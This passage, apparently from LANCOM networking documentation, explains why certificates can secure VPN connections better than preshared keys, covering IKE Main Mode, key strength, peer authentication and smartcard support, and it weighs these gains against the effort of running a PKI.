In some cases the use of certificates for securing VPN connections can be an alternative to the otherwise widespread preshared key (PSK) method:
- Higher security for VPN client connections (with IKE Main Mode) When using PSK connections between peers that use dynamic IP addresses, the Main Mode cannot be used. In these cases, the aggressive mode must be used with it lesser degree of security. Using certificates allows peers with dynamic IP addresses, such as dial-in computers with the LANCOM Advanced VPN Client, to use the Main Mode and thus to increase the level of security.
- Higher security for keys and passwords Preshared keys are just as susceptible as other passwords, too. The way that users treat these passwords (the "human factor") is a major factor in the securing of connections. With a certificate-based VPN establishment, the keys in the certificates are automatically generated with the desired key length. Furthermore, the random keys generated by computers offer more security from attack (e.g. dictionary attack) than the preshared keys of the same key length that are thought up by people.
- Peer authenticity can be checked The use of certificates allows both ends of the connection to be authenticated during VPN connection establishment. Certificates can contain additional information useful for checking the peers. Additional protection is provided by a time limitation of the certificates, e.g. for users receiving only temporary access to a network.
- Support of tokens and smartcards Certificates stored on external data media can be integrated into "strong security" environments which prevent passwords from being read from computers.
The advantages of certificates have to be considered in relation to the considerable increase in effort of introducing and maintaining a public key infrastructure (PKI).
